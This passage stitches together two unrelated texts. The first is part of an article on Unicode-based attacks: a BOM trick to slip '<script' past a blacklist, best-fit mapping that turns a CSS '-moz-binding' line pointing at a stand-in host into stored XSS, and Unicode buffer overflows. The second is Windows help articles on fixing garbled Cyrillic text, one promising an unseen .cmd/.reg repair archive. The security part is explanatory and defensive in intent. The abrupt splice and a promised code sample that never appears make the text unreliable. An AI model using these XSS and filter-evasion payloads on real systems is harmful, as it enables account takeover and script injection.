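print(greedy_utf8_decode(html_bytes))
# <img alt="xxx?rc="http:// src=javascript:alert(1)//">

# A strict decoder replaces only the bad byte, so the closing quote survives
print(html_bytes.decode("utf-8", errors="replace"))
```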

Here is another filter-bypass example from the same series, this time without any odd behavior of PHP functions. Suppose a WAF/IPS blocks strings from a blacklist, but a later processing step in the decoder removes characters outside the ASCII range. Then the following code will pass freely into the decoder:

Once the \uFEFF is removed, the payload ends up exactly where the attacker wants it. You can fix this simply by thinking through the string-processing logic. As always, the filter must work on the data in the form it has at the last stage of processing. By the way, as you may remember, \uFEFF is the BOM I wrote about earlier. Firefox was affected by this vulnerability: mozilla.org/security/announce/2008/mfsa2008-43.html
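A minimal Python sketch of this ordering mistake follows. `waf_allows` and `strip_non_ascii` are hypothetical stand-ins for the blacklist filter and the later processing step, and the payload is an illustrative one with a BOM inside the keyword.

```python
def waf_allows(s: str) -> bool:
    """Hypothetical blacklist filter that runs first."""
    return "<script" not in s.lower()


def strip_non_ascii(s: str) -> str:
    """Hypothetical later processing step that drops non-ASCII characters."""
    return "".join(ch for ch in s if ord(ch) < 0x80)


attack = "<scr\ufeffipt>alert(1)</script>"

print(waf_allows(attack))  # True: the BOM splits the keyword
final = strip_non_ascii(attack)
print(final)               # <script>alert(1)</script>
print(waf_allows(final))   # False: checking the final form catches it
```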

Filter Bypass - Step #4

The type of attack we will discuss now can be described as visual spoofing aimed at all kinds of IDS/IPS, WAFs, and other filters. I am talking about the so-called "best-fit mapping" Unicode algorithm. This "best fit" method was invented for cases where a character is missing from the target encoding during conversion, but something still has to be inserted. The converter then looks for a character that visually resembles the desired one.

Although this algorithm comes from Unicode, it is just another temporary solution that will live on indefinitely. It all depends on the scale and speed of the transition to Unicode. The standard itself advises resorting to best-fit mapping only as a last resort. The behavior of the conversion cannot be strictly regulated or generalized, because there are too many variants of similarity even for a single character. Everything depends on the character and on the encodings involved.

For example, the infinity symbol can be converted to the digit eight. They look similar but have completely different purposes. Another example: the character U+2032 (PRIME) is converted to a single quote. I think you understand what that means.

Information security specialist Chris Weber experimented with this question: how well do social networks cope with filters and best-fit mapping? On his website, he describes an example of good but insufficient filtering in one social network. Users could upload their own styles to their profiles, and these styles were carefully checked.

The developers made sure this string would not get through: -moz-binding: url(http://nottrusted.com/gotcha.xml#xss)

However, Chris was able to bypass this protection by replacing the very first character with a minus sign, U+2212. After best-fit mapping, the minus sign was replaced with U+002D (hyphen-minus), which made the CSS style work and thereby opened the way to a persistent (stored) XSS attack. Any such magic is best avoided, yet there is plenty of it around. Until the very last moment, it is impossible to predict what applying this algorithm will lead to. In the best case, characters may be lost. In the worst case, JavaScript code may be executed, arbitrary files accessed, or SQL injected.
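Real best-fit tables are platform-specific and much larger. The Python sketch below uses a tiny hypothetical `BEST_FIT` table containing only the mappings mentioned in the text. It shows why a check made before the conversion is worthless once the conversion runs.

```python
# Hypothetical best-fit table: a few look-alike mappings of the kind described above
BEST_FIT = {
    "\u2212": "-",  # MINUS SIGN -> HYPHEN-MINUS (U+002D)
    "\u221e": "8",  # INFINITY -> digit eight
    "\u2032": "'",  # PRIME -> apostrophe
}


def best_fit_to_ascii(s: str) -> str:
    # Keep ASCII, map known look-alikes, silently drop everything else
    return "".join(ch if ord(ch) < 0x80 else BEST_FIT.get(ch, "") for ch in s)


def css_filter_allows(css: str) -> bool:
    """Hypothetical check that runs before the conversion."""
    return "-moz-binding" not in css.lower()


css = "\u2212moz-binding: url(http://nottrusted.com/gotcha.xml#xss)"
print(css_filter_allows(css))                # True: U+2212 is not "-"
converted = best_fit_to_ascii(css)
print(converted.startswith("-moz-binding"))  # True
print(css_filter_allows(converted))          # False, but the check already ran
```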

Buffer overflow

As I wrote earlier, you should be careful with normalization, because strings can shrink or grow unexpectedly. Growth often leads to a buffer overflow: programmers compare string lengths incorrectly and forget about Unicode's peculiarities. The error usually comes from ignoring or misunderstanding the following facts:

- Strings can grow when their case changes, from upper to lower or vice versa.

- NFC does not always compose; some characters are decomposed by it.

- Converting text from one encoding to another can also make it grow, and how much it grows depends on the data itself and on the encoding.
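Each of the three facts can be checked with Python's standard library. The specific characters are illustrative picks. U+0958 (DEVANAGARI LETTER QA) is one of the characters excluded from composition, so NFC decomposes it. A buffer sized from the original length would be too small in every case below.

```python
import unicodedata

# Case mapping can lengthen a string
print(len("ß"), len("ß".upper()))                   # 1 2  ("SS")

# NFC is not always shorter: U+0958 is excluded from composition
print(len(unicodedata.normalize("NFC", "\u0958")))  # 2

# Converting between encodings changes the byte count
word = "Привет"
print(len(word.encode("cp1251")), len(word.encode("utf-8")))  # 6 12
```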

In principle, if you know what a buffer overflow is, everything works as usual. Almost :). The difference is that in Unicode strings, characters will most often be padded with zero bytes. For example, here is the same string in three forms.

Regular string: ABC

In ASCII encoding: \x41\x42\x43

In Unicode (UTF-16LE) encoding:

\x41\x00\x42\x00\x43\x00
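The three forms above can be reproduced with Python's codecs. "Unicode" here means UTF-16LE, the form Windows uses internally. The Cyrillic sample is an illustrative addition that shows letters outside ASCII filling both bytes.

```python
latin = "ABC"
cyrillic = "АБВ"  # U+0410..U+0412

print(latin.encode("ascii"))         # b'ABC'
print(latin.encode("utf-16-le"))     # b'A\x00B\x00C\x00'
print(cyrillic.encode("utf-16-le"))  # b'\x10\x04\x11\x04\x12\x04'

# ASCII characters gain a zero byte in UTF-16LE; these Cyrillic letters do not
print(b"\x00" in latin.encode("utf-16-le"), b"\x00" in cyrillic.encode("utf-16-le"))  # True False
```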

Where the source characters lie outside the ASCII range, there are usually no null bytes, because such characters occupy both bytes. As you know, null bytes are an obstacle to working shellcode. That is why Unicode attacks were long believed to be impossible. However, Chris Anley destroyed this myth with the so-called "Venetian method", which lets you replace null bytes with other characters. This topic deserves a separate article, and there are already quite a few good publications; just search for "venetian exploit". You can also look through Hacker magazine special issue #45, "Unicode-Buffer Overflows", which has a good write-up on writing Unicode shellcode.

Other joys

And this is not the end of Unicode-related vulnerabilities. I have described only those that fall under the main, well-known categories. There are other security issues too, from annoying bugs to real breaches. Some attacks are visual. For example, if the registration system processes user logins incorrectly, you can create an account from characters that are visually indistinguishable from the victim's name, which makes phishing and social engineering easier. It can be even worse: the authorization system (not to be confused with authentication) may grant elevated privileges without distinguishing between the characters in the attacker's login and those in the victim's.

At the level of applications or operating systems, bugs show up in poorly designed conversion algorithms: poor normalization, overlong UTF-8, character deletion and "eating", incorrect character conversion, and so on. All of this leads to the widest range of attacks, from XSS to remote code execution.

In general, Unicode does not limit your imagination in any way; on the contrary, it feeds it. Many of the attacks above are combined, pairing a filter bypass with an attack on a specific target: business with pleasure, so to speak. Moreover, the standard does not stand still, and who knows what new extensions will bring, since some earlier ones were later removed altogether because of security problems.

Happy end?!

So, as you can see, Unicode problems remain a leading cause of all sorts of attacks. And there is only one root of evil: misunderstanding or ignoring the standard. Even the best-known vendors are guilty of this, but that is no reason to relax. On the contrary, it is worth thinking about the scale of the problem. You have already seen that Unicode is quite insidious, so expect a catch if you give up and fail to consult the standard in time. By the way, the standard is updated regularly, so do not rely on old books or articles: outdated information is worse than none. I hope this article has not left you indifferent to the problem.

Punycode - the skeleton of compatibility

DNS does not allow any characters in domain names other than Latin letters, digits, and hyphens; in effect, it uses a truncated ASCII table.

Therefore, for the sake of backward compatibility, a multilingual (Unicode) domain name has to be converted to the old format. The user's browser takes care of this. After the conversion, each non-ASCII label of the domain becomes an ASCII string with the prefix "xn--"; the encoding used is called Punycode. For example, the domain "хакер.ru" looks like "xn--80akozv.ru" after conversion. Read more about Punycode in RFC 3492.
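Python's standard library can reproduce this conversion: its `idna` codec implements the older IDNA2003 rules (RFC 3490), and its `punycode` codec implements the raw RFC 3492 algorithm. A minimal sketch:

```python
domain = "хакер.ru"

# IDNA2003 ToASCII: every non-ASCII label becomes "xn--" + Punycode.
ascii_domain = domain.encode("idna")
print(ascii_domain)  # b'xn--80akozv.ru'

# Raw Punycode of a single label, without the "xn--" prefix.
print("хакер".encode("punycode"))  # b'80akozv'

# The reverse conversion, as a browser does when displaying the address.
print(ascii_domain.decode("idna"))  # хакер.ru
```

For IDNA2008 rules, the third-party `idna` package is commonly used instead; the built-in codec is shown here only because it needs no installation.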

info

IDNA (Internationalizing Domain Names in Applications) is a protocol that solves many of these problems by allowing multilingual domain names to be used in applications. It was developed by the IETF. At the time of writing, only the old version, IDNA2003, had been published as an RFC (RFC 3490); the new standard, IDNA2008 (since published as RFC 5890 and related documents), is incompatible with the previous one.

Links

- unicode.org is the official website of the Unicode Consortium. Answers to most questions on this sore subject can be found here.

- macchiato.com/main - many useful online tools for working with Unicode.

- fiddler2.com/fiddler2 - Fiddler, a powerful, extensible HTTP proxy.

- websecuritytool.codeplex.com - Fiddler plugin for passive analysis of HTTP traffic.

- lookout.net - Chris Weber's site for Unicode, the web, and software auditing.

- sirdarckcat.blogspot.com/2009/10/couple-of-unicodeissueson-php-and.html - a post on sirdarckcat's blog about PHP and Unicode.

- googleblog.blogspot.com/2010/01/unicode-nearing-50of-web.html - Google blog post on the general growth trend in Unicode usage.

Krakozyabry: what an interesting word! Russian users usually use it to describe characters that are displayed incorrectly (in the wrong encoding) in programs or in the operating system itself.

Why does this happen? There is no single answer. It may be the work of our "favorite" viruses, it may be a failure of Windows itself (for example, the power went out and the computer shut down), or a program may have conflicted with another program or with the OS and everything "broke". In general, there can be many reasons, and the most interesting one is "it just broke all by itself".

Read on to find out how to fix the encoding problem in programs and in Windows once it has already happened.

For those who still don't understand what I mean, here are a few examples:

By the way, I once got into this situation myself, and I still keep the file that helped me deal with it on my Desktop. That is why I decided to write this article.

Several things are responsible for how encodings (fonts) are displayed in Windows: the language settings, the registry, and the files of the OS itself. Let's check them one at a time, point by point.

How to get rid of krakozyabry in place of Russian letters in a program or in Windows

1. Check the language set for programs that do not support Unicode. It may have been reset.

Go to Control Panel - Regional and Language Options - Advanced tab.

Make sure the language selected there is Russian.

In Windows XP there is also a "Code page conversion tables" list at the bottom of this tab, with a line for code page 20880. Russian must be selected there as well.
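The "language for non-Unicode programs" setting effectively selects the system code pages: for Russian, the ANSI code page 1251 used by non-Unicode Windows programs and the OEM code page 866 used by the console. Below is a read-only Python sketch to check what is currently set. It assumes the values live under the standard `HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage` key, and it simply returns `None` on non-Windows systems. The function name is hypothetical.

```python
import sys


def read_code_pages():
    """Return the ANSI and OEM code pages from the registry (Windows only).

    Read-only: nothing is modified. Returns None on non-Windows systems.
    """
    if sys.platform != "win32":
        return None
    import winreg  # part of the standard library, but only on Windows

    path = r"SYSTEM\CurrentControlSet\Control\Nls\CodePage"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
        acp, _ = winreg.QueryValueEx(key, "ACP")  # stored as a string
        oemcp, _ = winreg.QueryValueEx(key, "OEMCP")
    return {"ACP": acp, "OEMCP": oemcp}


# With Russian selected for non-Unicode programs: {'ACP': '1251', 'OEMCP': '866'}
print(read_code_pages())
```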

6. The last step: here is the file that once helped me fix everything, which is why I kept it as a keepsake. Here is the archive:

There are two files inside: krakozbroff.cmd and krakozbroff.reg

Both do the same thing: they fix hieroglyphs, squares, question marks, or exclamation marks (krakozyabry, in a word) in programs and in Windows by every available means. I used the first one, and it worked for me.

And finally, a couple of tips:

1) If you edit the registry, do not forget to make a backup copy first in case something goes wrong.

2) After each step, it is a good idea to re-check step 1.

That's all. Now you know how to get rid of krakozyabry (squares, hieroglyphs, exclamation and question marks) in a program or in Windows.

Probably every PC user has run into this problem: you open a web page or a Microsoft Word document, and instead of text you see hieroglyphs ("krakozyabry": unfamiliar letters, numbers, and so on, as in the picture on the left).

It's fine if the document with hieroglyphs is not particularly important to you, but what if you need to read it? I am quite often asked such questions and asked for help opening such texts. In this short article I want to look at the most common causes of hieroglyphs (and, of course, how to get rid of them).

Hieroglyphs in text files (.txt)

This is the most common case. A text file (usually .txt, but also .php, .css, .info, and so on) can be saved in various encodings.

An encoding is a set of characters, together with their numeric codes, needed to write text in a particular alphabet (including digits and special characters). More details here: https://ru.wikipedia.org/wiki/CharacterSet

Most often, what happens is simple: the document is opened in the wrong encoding, so the stored codes are mapped to the wrong characters. As a result, strange symbols appear on the screen (see Fig. 1).

Fig. 1. Notepad: encoding problem
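Here is what "the wrong encoding" means in practice, as a small Python sketch: the same bytes are decoded with the Cyrillic (Windows) table and with the Western European (Windows) table. The sample word is arbitrary.

```python
original = "Привет"

# Saved by a program that uses the Cyrillic (Windows) table, code page 1251...
raw = original.encode("cp1251")

# ...and opened by one that assumes Western European (Windows), code page 1252.
garbled = raw.decode("cp1252")
print(garbled)  # Ïðèâåò

# The bytes were never damaged: undo the wrong step and use the right table.
repaired = garbled.encode("cp1252").decode("cp1251")
print(repaired)  # Привет
```

The repair works only because the wrong decoding did not lose any bytes; if the garbled text was saved with replacement characters, the original cannot be fully recovered.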

How to deal with it?

In my opinion, the best option is to install an advanced text editor such as Notepad++ or Bred 3. Let's take a closer look at each of them.

Notepad++

Official site: https://notepad-plus-plus.org/

One of the best text editors for both beginners and professionals. Pros: it is free, supports the Russian language, works very fast, highlights code, opens all common file formats, and has a huge number of options that let you customize it.

As for encodings, everything is in perfect order here: there is a separate "Encoding" menu (see Fig. 2). Just try switching from ANSI to UTF-8, for example.

After changing the encoding, my text document became normal and readable: the hieroglyphs disappeared (see Fig. 3)!

Fig. 3. The text became readable (Notepad++)
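Switching the encoding in Notepad++ amounts to decoding the same bytes with a different table. A rough Python equivalent, assuming the file is either UTF-8 (with or without a BOM) or Windows-1251; the function name and the candidate list are illustrative:

```python
from typing import Tuple


def decode_text(data: bytes, candidates=("utf-8-sig", "cp1251")) -> Tuple[str, str]:
    """Decode `data` with the first candidate encoding that fits.

    "utf-8-sig" is plain UTF-8 that also strips a leading BOM if present.
    Returns (text, encoding_used).
    """
    for encoding in candidates:
        try:
            return data.decode(encoding), encoding
        except UnicodeDecodeError:
            continue  # not valid in this encoding, try the next one
    raise ValueError("none of the candidate encodings fit")


text, used = decode_text("Привет".encode("cp1251"))
print(used, text)  # cp1251 Привет
```

UTF-8 is tried first because invalid UTF-8 is detected reliably, while Windows-1251 accepts almost any byte sequence and therefore only works as a fallback. To apply it to a file, pass it the bytes from `Path("file.txt").read_bytes()` (from `pathlib`).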

Bred 3

Official website: http://www.astonshell.ru/freeware/bred3/

Another great program designed as a complete replacement for the standard Windows Notepad. It also handles many encodings with ease, switches between them easily, supports a huge number of file formats, and runs on newer versions of Windows (8, 10).

By the way, Bred 3 helps a lot with "old" files saved in MS-DOS formats. Where other programs show only hieroglyphs, Bred 3 opens such files easily and lets you work with them without trouble (see Fig. 4).
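Russian text from MS-DOS programs is usually stored in code page 866, which is why Windows programs that assume code page 1251 show garbage. A minimal Python illustration:

```python
# Russian text as an MS-DOS program would have saved it (code page 866).
dos_bytes = "Привет".encode("cp866")

print(dos_bytes.decode("cp1251"))  # ЏаЁўҐв  (wrong table)
print(dos_bytes.decode("cp866"))   # Привет  (right table)

# Converting such a file for modern programs is a decode/encode round trip.
utf8_bytes = dos_bytes.decode("cp866").encode("utf-8")
```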

Hieroglyphs instead of text in Microsoft Word

The very first thing to check is the file format. Starting with Word 2007, a new format appeared: "docx" (previously it was just "doc"). Usually the "old" Word cannot open the new formats, but sometimes these "new" files do open in the old program, and then the text shows up as hieroglyphs.

Just open the file's properties and look at the "Details" tab (as in Fig. 5). This shows you the file format (in Fig. 5, the file format is "txt").

If the file format is docx and you have an old version of Word (older than 2007), simply update Word to 2007 or later (2010, 2013, 2016).
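You can also tell these formats apart without Word by looking at the first bytes of the file: a .docx is a ZIP package, while a legacy .doc is an OLE2 compound file. A small Python sketch (the function name is hypothetical; a ZIP signature only proves the file is a ZIP archive, so .xlsx or plain .zip files would match too):

```python
ZIP_MAGIC = b"PK\x03\x04"                         # .docx: ZIP package (Office Open XML)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc: OLE2 compound file


def sniff_word_format(header: bytes) -> str:
    """Guess the container format from the first 8 bytes of a file."""
    if header.startswith(ZIP_MAGIC):
        return "docx"   # or any other ZIP-based file
    if header.startswith(OLE_MAGIC):
        return "doc"    # or any other OLE2 file, e.g. an old .xls
    return "other"      # e.g. plain text (.txt) or RTF


# Usage (the file name is a placeholder):
# with open("document.docx", "rb") as f:
#     print(sniff_word_format(f.read(8)))
```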

Next, pay attention when opening the file: Word will ask which encoding to use to open it (this option is enabled by default, unless you have some obscure custom build of Office). This prompt appears whenever there is any hint of a problem with opening the file (see Fig. 6).

Fig. 6. Word: file conversion

Most often Word detects the required encoding automatically, but the text is not always readable. Move the selection through the list of encodings until the text in the preview becomes readable. Sometimes you literally have to guess which encoding the file was saved in to be able to read it.

Fig. 7. Word: the file displays correctly (the right encoding is selected)!
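Guessing the encoding, as Word does, needs a heuristic, because single-byte tables such as Windows-1251, KOI8-R, and CP866 accept almost any bytes without an error. The Python sketch below shows one simple heuristic, not Word's actual algorithm: it assumes ordinary Russian prose, which is mostly lowercase, and picks the table that yields the largest share of lowercase Russian letters. The names and the candidate list are illustrative.

```python
from typing import Optional

# Illustrative candidates for Russian text; their order also breaks ties.
CANDIDATES = ("cp1251", "koi8_r", "cp866", "cp1252")


def lowercase_russian_share(text: str) -> float:
    """Fraction of the letters in `text` that are lowercase Russian letters."""
    letters = [ch for ch in text if ch.isalpha()]
    if not letters:
        return 0.0
    lower = sum(1 for ch in letters if "а" <= ch <= "я" or ch == "ё")
    return lower / len(letters)


def guess_encoding(data: bytes, candidates=CANDIDATES) -> Optional[str]:
    """Return the candidate that makes `data` look most like Russian prose."""
    best, best_score = None, -1.0
    for encoding in candidates:
        try:
            text = data.decode(encoding)
        except UnicodeDecodeError:
            continue  # this table cannot represent these bytes at all
        score = lowercase_russian_share(text)
        if score > best_score:
            best, best_score = encoding, score
    return best


sample = "Привет, как дела?"
for enc in ("cp1251", "koi8_r", "cp866"):
    print(enc, "->", guess_encoding(sample.encode(enc)))
```

On short or mostly uppercase text this heuristic can easily pick the wrong table, so treat its answer as a suggestion to check by eye, just as with Word's preview.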

Changing the encoding in the browser

When the browser detects the encoding of a web page incorrectly, you will see exactly the same hieroglyphs (see Fig. 8).

Fig. 8. The browser detected the wrong encoding

To fix how the site is displayed, change the encoding in the browser settings:

- Google Chrome: settings (icon in the upper right corner) / Advanced settings / Encoding / Windows-1251 (or UTF-8);

- Firefox: press the left Alt key (if the menu bar is hidden), then View / Encoding / select the one you need (most often Windows-1251 or UTF-8);

- Opera: Opera menu (red icon in the upper left corner) / Page / Encoding / select the one you need.
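Browsers normally take the encoding from the `charset` parameter of the server's `Content-Type` header (or from a `<meta charset>` tag in the page) and have to guess when it is missing. The Python sketch below reads the header only; the fallback to Windows-1251 is an assumption for Russian-language sites, and the function names are hypothetical.

```python
from email.message import Message
from typing import Optional


def declared_charset(content_type: str) -> Optional[str]:
    """Return the charset from a Content-Type header value, or None."""
    msg = Message()
    msg["Content-Type"] = content_type
    return msg.get_content_charset()  # lowercased by the email package


def decode_page(body: bytes, content_type: str, fallback: str = "windows-1251") -> str:
    """Decode a page body using the declared charset, else an assumed fallback."""
    charset = declared_charset(content_type) or fallback
    return body.decode(charset, errors="replace")


print(declared_charset("text/html; charset=windows-1251"))  # windows-1251
print(declared_charset("text/html"))                        # None
```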

So, this article has covered the most common cases of hieroglyphs caused by an incorrectly detected encoding. With the methods above, you can solve the main problems with incorrect encoding.
